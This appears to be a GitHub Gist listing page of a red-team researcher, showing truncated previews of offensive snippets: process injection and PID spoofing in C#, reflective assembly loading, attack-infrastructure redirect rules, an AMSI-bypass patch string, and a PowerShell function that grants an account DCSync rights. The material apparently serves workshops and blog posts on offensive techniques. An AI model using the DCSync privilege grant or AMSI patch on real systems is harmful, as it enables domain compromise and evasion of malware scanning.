Jean-François Maes jfmaes
jfmaes
/ DInjectQueuerAPC.cs
Created
November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
jfmaes
/ pidspoofDinvoke.cs
Last active
January 17, 2023 02:28
PIDSpoof-DInvoke-Dev-Nuget-NoDynamicAPIIInvoke
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Diagnostics; | |
| namespace DInvoke_PIDSpoof_DevNuget | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) |
jfmaes
/ HelloFromDotNetFramework.cs
Last active
December 20, 2020 21:53
Sample Hello World for blogpost
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| namespace HelloFromDotNetFramework | |
| { | |
| public class Program | |
| { | |
| public static void Main(string[] args) | |
| { | |
| Console.WriteLine("Hi from {0}", Assembly.GetExecutingAssembly()); |
jfmaes
/ reflectiondemo.ps1
Created
December 21, 2020 09:09
Sample Reflection of the HelloFromDotNetFramework assembly for the blogpost
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| clear | |
| $bytes=[System.IO.File]::ReadAllBytes("C:\Users\jeanm\source\repos\HelloFromDotNetFramework\bin\Release\HelloFromDotNetFramework.exe") | |
| $asm = [System.Reflection.Assembly]::Load($bytes) | |
| $params = {null} | |
| [HelloFromDotNetFramework.Program]::Main($params) |
jfmaes
/ AppDomainResolveTest.cs
Created
December 21, 2020 09:53
example ingestor of NvisoLib for the blogpost
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using NvisoLib; | |
| using System.Reflection; | |
| namespace AppDomainResolveTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
jfmaes
/ .htaccess
Created
March 23, 2021 12:19
— forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
jfmaes
/ ssl-scraper.py
Last active
September 10, 2021 16:52
extract hostnames based on SSL certificates
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| from socket import * | |
| from requests.packages.urllib3.contrib import pyopenssl as reqs | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| import argparse | |
| import ipaddress | |
| #import asyncio |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hi SANS Workshop Attendees! Reflection is super fun! | |
| amsi.dll | |
| AmsiScanBuffer | |
| uFcAB4DD |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| from ipaddress import IPv4Network | |
| import os | |
| def banner(): | |
| print(r""" | |
| c=====e | |
| H | |
| ____________ _,,_H____ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SyncMeUp{ | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory=$True)] | |
| [string]$AccountName | |
| ) | |
| $dse = [ADSI]"LDAP://Rootdse" | |
| $namingcontext = $dse.defaultNamingContext | |
| echo "Giving $AccountName DCSync rights" | |
| dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes" |
OlderNewer